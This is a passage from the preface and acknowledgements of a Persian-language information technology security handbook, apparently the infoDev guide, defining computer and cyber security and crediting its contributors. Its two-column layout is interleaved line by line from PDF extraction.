ﺍﻳﻦ ﻃﺮﻳﻖ ﺑﻪ ﺗﻤﺎﻣﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺫﺧﻴﺮﻩ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻭ ﺍﺭﺳـﺎﻝ ﻻ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻧﻘﺼﻬﺎ ﮔﺰﺍﺭﺵ ﻧﻤﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻃﻼﻉﻣﻌﻤﻮ ﹰ
ﺍﻃﻼﻋﺎﺕ ،ﺳﺨﺖﺍﻓﺰﺍﺭ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﻭ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،ﺑـﺎ ﻳـﻚ
ﻧﮕﺎﻩ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺍﻃﻼﻋﺎﺕ ﺑﭙﺮﺩﺍﺯﻳﻢ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ
11 Help Centers
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٦
ﺧﻮﺍﻧﻨﺪﻩ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﺆﻟﻔﻴﻦ ﺑﺮﺍﻱ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻭ ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ ﻛـﻪ ﻫـﻢ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ
ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻧـﺪ .ﺑﻄـﻮﺭ ﻛﻠـﻲ ﭘﺮﺩﺍﺯﺵ ﺁﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺼﻮﻥ ﺑﺎﺷﻨﺪ.
ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ: ﻣﺎ ﺗﻌﻤﺪﹰﺍ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺟﻪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ
(۱ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ :ﺍﻣﻨﻴﺖ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎ ،ﻧﺮﻡﺍﻓـﺰﺍﺭ، ﺷﺒﻜﻪﻫﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩﺍﻳﻢ؛ ﭼﺮﺍﻛﻪ ﻣﻨﺎﺑﻊ ﻏﻨﻲ ﻭ ﻣﺘﻌـﺪﺩﻱ ﺑـﺮﺍﻱ
ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ .ﺍﺯ ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ ﺁﮔﺎﻫﻲ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺩﻳﮕﺮ ﻧﻈﻴﺮ ﺗﻠﻔﻦ ﺛﺎﺑﺖ ﻭ ﻫﻤﺮﺍﻩ ﻛﻪ ﺩﺭ
ﺩﻭﻡ ﻭ ﭘــﻨﺠﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﺷــﺪﻩ ﻛــﻪ ﺑﻴــﺸﺘﺮ ﺑــﺮ ﺭﻭﻱ ﺍﺑﻌــﺎﺩ ﺍﺭﺗﺒﺎﻁ ﺗﻨﮕﺎﺗﻨﮓ ﺑﺎ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺑـﻪ ﺁﻧﻬـﺎ
ﻓﻴﺰﻳﻜﻲ ،ﺯﻳﺮﺳﺎﺧﺘﻲ ﻭ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ. ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺎ ﻧﺰﺩﻳﻜﺘﺮ ﺷﺪﻥ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻨـﻲ ﻭ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ،ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﻧﻴﺰ ﺍﻫﻤﻴﺖ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ
(۲ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ :١٢ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ
ﻣــﻲﻛﻨﻨــﺪ .ﺑــﺎ ﭘﻴــﺪﺍﻳﺶ Voice over IPﻭ ،ENUM
ﺳﻴﺎﺳﺖ ﺩﻭﻟﺘﻬﺎ .ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﻋﻤﻮﻣـﹰﺎ ﺗﻮﺳـﻂ ﻣﺆﺳـﺴﺎﺕ
ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﻠﻔﻦ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺑـﺎ
ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻣﻠﻲ ﺩﺭ ﺍﺳﻨﺎﺩ ،ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﮊﻩﻫﺎﻱ
ﭘﻴﺪﺍﻳﺶ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ 3Gﺑﺘﺪﺭﻳﺞ ﺑﻪ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ ﻭ ﻛﻤﺎﺑﻴﺶ ﻣﺘﺮﺍﺩﻑ ﺑﺎ "ﺍﻣﻨﻴـﺖ
ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﻛﺮﺩ.
ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ )ﺍﺻﻄﻼﺣﻲ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ ﺍﻱ
ﻧﺸﺪﻩ ،ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺮﺍﺟﻊ ﺩﻳﮕﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ( .ﻫـﺮ ﺩﻭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑـﻪ ﻧﺤـﻮﻱ ﺗـﺪﻭﻳﻦ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﻋﺒﺎﺭﺕ ﺑﻪ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺖ ﺷـﺒﻜﻪ ﻭ ﺍﺻـﻮﻝ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺍﻧﺪﻙ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ .ﻫﺪﻑ ﺍﺯ
ﺷﺒﻜﻪﻫﺎ ﻣﺜﻞ ﺗﻌﺮﻳـﻒ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ،ﺟـﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ، ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺗﻴـﺮﺍﮊ ﺑـﺎﻻﻳﻲ ﺍﺯ ﺁﻥ ﺩﺳـﺖ
ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺟﻬﺎﻧﻲ ﺍﺷﺎﺭﻩ ﺩﺍﺭﻧـﺪ .ﺗﻔـﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ ﻳﺎﺑﻴﻢ ،ﺑﻠﻜﻪ ﺑﻨﺎ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻔﺎﺩ ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﺍﺻــﻄﻼﺡ ﭼﻨــﺪﺍﻥ ﺯﻳــﺎﺩ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﺩﺭ ﺟﻬﺎﻧﻲ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﺩﻭ ﻟﺤﺎﻅ ﭘﻮﻳﺎ ﺑﺎﺷﺪ :ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻄﺎﻟﺐ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺼﻠﻬﺎﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﻣـﻲ ﺗـﻮﺍﻥ ﺩﻳـﺪ ،ﺍﻣﻨﻴـﺖ ﺁﻥ ﺗﺎ ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺑﺎﺷﺪ ،ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋـﺎﺕ
ﺭﺍﻳﺎﻧﻪ ﻫﺎ ،ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺗـﺎ ﺣـﺪ ﺯﻳـﺎﺩﻱ ﺑـﺎ ﻣﻔـﺎﻫﻴﻢ ﻣﻔﻴﺪ ﻭ ﻣﻨﺎﺳﺒﻲ ﺑﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﺑـﺪﻧﺒﺎﻝ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺗﻲ
ﺭﻭﺯﻣﺮﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻢ ﮔﺮﻩ ﺧﻮﺭﺩﻩﺍﻧﺪ. ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺍﺭﺍﺋﻪ ﻛﻨﺪ.
ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳﺮﻳﻊ ﻭ ﺩﺭﺣـﺎﻝ ﭘﻴـﺸـﺮﻓﺖ ﺍﻣـﺮﻭﺯ ،ﺗـﺪﻭﻳﻦ ﮐﺘـﺎﺏ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻪ ﭘـﻨﺞ ﺑﺨـﺶ ﻣﺨﺘﻠـﻒ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﻛـﻪ
ﺭﺍﻫﻨﻤﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻳﻦ ﺧﻄﺮ ﺍﺳﺖ ﻛﻪ ﺍﻧﺪﻛﻲ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﺯ ﻫﺮﻳﻚ ﻣﻨﺎﺳﺐ ﮔﺮﻭﻩ ﺧﺎﺻﻲ ﺍﺯ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ .ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ
ﺭﺩﻩ ﺧﺎﺭﺝ ﻭ ﻗﺪﻳﻤﻲ ﺷﻮﺩ .ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺘﺎﺏ ﮔﺎﻫﻲ ﻣـﻲﺗـﻮﺍﻥ ﻣﻄﺎﻟـﺐ
ﻛﺘــﺎﺏ ﺗﻤــﺎﻣﻲ ﺑﺨــﺸﻬﺎﻱ ﺁﻥ ﺩﺭ ﻳــﻚ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺑــﻪ ﺁﺩﺭﺱ ﻣﺸﺘﺮﻙ ﻭ ﺗﻜﺮﺍﺭﻱ ﭘﻴـﺪﺍ ﻛـﺮﺩ ،ﭼﺮﺍﻛـﻪ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
www.infodev-security.netﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ ﺗﺎ ﻫﺮﻳﻚ ﺭﺍ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺑﺨـﺸﻲ ﺍﺯ ﻛﺘـﺎﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ
ﺑﺘﻮﺍﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻮﺩ .ﺧﻮﺍﻧﻨـﺪﮔﺎﻧﻲ ﻛـﻪ ﻣﺎﻳـﻞ ﺑـﻪ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻛﺎﺭ ﺁﻧﻬﺎ ﻣﻲﺁﻳﺪ .ﺑﻌﻀﻲ ﺑﺨﺸﻬﺎ -ﺧـﺼﻮﺻﹰﺎ
ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻣﻄﺎﻟﺐ ﻣﻔﻴﺪ ﺩﺭ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﺷـﻨﺪ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ -
ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﻣﻨﺘﺸﺮ ﻭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ
contact@infodev-security.netﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ. ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻮﺯﻳﻊ ﻧﻤﻮﺩ.
ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺪﻭﻥ ﺣﻤﺎﻳﺖ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻭ ﻣﺆﺳـﺴﺎﺕ ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴﺎﻥ ﺍﺻـﻮﻝ
ﻭﻳــﮋﻩ ﻭ ﻣﻬــﻢ ﻫﻴﭽﮕــﺎﻩ ﻣﻤﻜــﻦ ﻧﺒــﻮﺩ ،ﺍﺯ ﺟﻤﻠــﻪ ﺳﻴﻤــﺴﻮﻥ ﻛﻠﻲ ،ﻧﻤﻮﻧﻪﻫﺎﻱ ﻭﻳﮋﻩ ،ﻭ ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻲ ﺑﻮﺩﻩﺍﻳﻢ ﻭ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ
ﮔﺎﺭﻓﻴﻨﻜﻞ ،١٣ﻛﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻣﻬﻤﻲ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳـﺎﺧﺘﺎﺭ ﺍﻭﻟﻴـﺔ ﻛﻪ ﺗﻮﺍﺯﻥ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺍﺯ ﺗﻨﺎﺳﺐ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺍﮔﺮﭼـﻪ ﺑـﺎ
ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻤﻮﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ ،ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻧﻴﺰ ﺗﻐﻴﻴﺮ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ،
ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﻴﻢ ﺗﻬﻴﻪﻛﻨﻨﺪﮔﺎﻥ ﻛﺘﺎﺏ ﻛﻤـﻚ ﻛـﺮﺩ .ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﺍﻣﺎ ﺍﻳﻦ ﺍﺻﻮﻝ ﻫﻤﻮﺍﺭﻩ ﺛﺎﺑﺖ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ ﻭ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﺍﺯ ﻧﻈـﺮ
ﺳﻴﺎﺳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﺁﺳـﺎﻥ
ﺁﻧﻬﺎ ﻣـﻲﺑﺎﺷـﻨﺪ .ﺍﮔـﺮ ﺍﻳـﻦ ﺍﺻـﻮﻝ ﺑـﺪﻗﺖ ﺩﺭﻙ ﺷـﻮﻧﺪ ﺁﻧﮕـﺎﻩ
12 Cyber-Security ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ ﺑﺴﺎﺩﮔﻲ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﮔﺮﻓﺖ.
13 Simson Garfinkel
١٧ ﭘﻴﺶﺩﺭﺁﻣﺪ
ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ٢٦ﻧﻴﺰ ﺗﺸﻜﺮ ﻧﻤﺎﻳﻴﻢ .ﻧﻮﺷﺘﻪ ﻫـﺎﻱ ﻭﻱ ﺩﺭ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﺪﻭﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻭ ﻛﻤﻚ ﺍﻭ ﻣﻴﺴﺮ ﻧﻤﻲﺷﺪ .ﺑﺮﻭﻧـﻮ
ﻣﻮﺭﺩ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،٢٧ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ ٢٨ﻭ ﻟﻨﻮﻳﻦ ،١٤ﻣﺪﻳﺮ infoDevﻛﻪ ﺍﻋﺘﺒـﺎﺭﺍﺕ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﺗﻔﻬـﻴﻢ
ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮ ﺳﻴﺎﺭ ٢٩ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻨﺎﺳﺒﺖ ﻭ ﻗﺪﺭﺕ ﺧﻠﻖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﺯﻳﻊ ﺁﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨـﺎﻭﺭﻱ
ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ. ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩ؛ ﻫﻤﭽﻨﻴﻦ ﮊﺍﻛﻠﻴﻦ ﺩﻭﺑـﻮ،١٥
ﺍﻟﻲ ﺍﻟﻮﻱ ،١٦ﺗﺮﻱ ﻧﺎﻛﺎﺯﻝ ١٧ﻭ ﻫﺮﻳﺮﻱ ﺑﺮﺗـﺎﺩﻭ ١٨ﻛـﻪ ﻫﻤﮕـﻲ ﺍﺯ
ﻣﺎﻛﺲ ﺍﺷﻨﻠﻤﻦ ٣٠ﻧﻤﺎﻳﻨﺪﺓ ﺳﻮﺋﻴﺲ ﺩﺭ ﻛﻤﻴﺘﺔ ﺗﻮﺳﻌﺔ ﺍﻃﻼﻋـﺎﺕ
ﻣﺪﻳﺮﺍﻥ infoDevﻫﺴﺘﻨﺪ .ﺍﺯ ﺗـﻴﻢ ﺍﻭﺭﻳﻠـﻲ ﻛـﻪ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺩﺭ ﺍﺟﻼﺱ ﭼﺎﻧﮓ ﻛـﻴﻦ ٣١ﭼـﻴﻦ ﺩﺭ ﺳـﺎﻝ ۲۰۰۲ﻧﻴـﺰ ﻳﻜـﻲ ﺍﺯ
ﺷﺮﻛﺖ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ١٩ﺩﻭ ﻛﺘـﺎﺏ ﺯﻳـﺮ ﺭﺍ ﻣﻨﺘـﺸﺮ
ﺍﻭﻟﻴﻦ ﻛﺴﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﺍﻫﻤﻴﺖ ﻭ ﻓﺎﻳﺪﺓ ﺩﺳﺘﻨﺎﻣﺔ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﻛﺮﺩﻧﺪ ﻧﻴﺰ ﺗﺸﻜﺮ ﻣﻲﻛﻨﻴﻢ :ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﻳﻮﻧﻴﻜﺲ،٢٠
ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﺍﺩ ﻭ
ﻭﻳﺮﺍﻳﺶ ﺳﻮﻡ )ﺳﻴﻤﺴﻮﻥ ﮔﺎﺭﻓﻴﻨﻜـﻞ ،ﮊﻥ ﺍﺳـﭙﺎﻓﻮﺭﺩ ٢١ﻭ ﺁﻟـﻦ ﺷـﻮﺍﺭﺗﺰ،٢٢
ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻭ ﺑﻮﺩ ﻛﻪ ﺑﻪ ﺣﻤﺎﻳﺖ ﺩﻭﻟﺖ ﺳﻮﺋﻴﺲ ﺍﺯ ٢٣
ﭼﺎﭖ (۲۰۰۳ﻭ ﺍﻣﻨﻴـﺖ ﻭﺏ ،ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ ﺗﺠـﺎﺭﺕ )ﺳﻴﻤـﺴﻮﻥ
infoDevﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻧﺠﺎﻣﻴﺪ ﻭ ﻣﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﻳـﻦ
ﮔﺎﺭﻓﻴﻨﻜﻞ ﻭ ﮊﻥ ﺍﺳﭙﺎﻓﻮﺭﺩ ،ﭼﺎﭖ .(۲۰۰۲ﺍﻳـﻦ ﻛﺘﺎﺑﻬـﺎ ﺑـﺮﺍﻱ ﺗﻜﻤﻴـﻞ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺗﻘﺪﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ.
ﺑﺨﺸﻬﺎﻱ ﻣﻬﻤـﻲ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺭﺍﻫﻨﻤـﺎ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﺎﻳﻜﻞ ﻣﻜﻠـﻲ ٣٢ﻧﻴـﺰ ﮔﺮﻭﻫـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻓﻌـﺎﻝ ﺭﺍ ﺑـﺮﺍﻱ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻭ ﭼﻨﺪ ﺑﺨﺶ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎ ﻛﺴﺐ ﻣﺠﻮﺯ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ
ﺗﺪﻭﻳﻦ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﺸﻜﻴﻞ ﺩﺍﺩ ﻭ ﻫﻤﻴﻦ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧـﺪ ﻛـﻪ ﻧﺎﺷﺮﺍﻥ ﺑﺮﺍﻱ ﭼﺎﭖ ﻣﺠﺪﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ.
ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺩﻗـﺖ ﻭ ﺗﻨﺎﺳـﺐ ﻧـﺴﺨﺔ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺷﺮﻛﺖ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺩﺭ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴـﺮ ﺩﻫﻬـﺎ
ﻧﻬﺎﻳﻲ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ؛ ﻭ ﻣـﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ
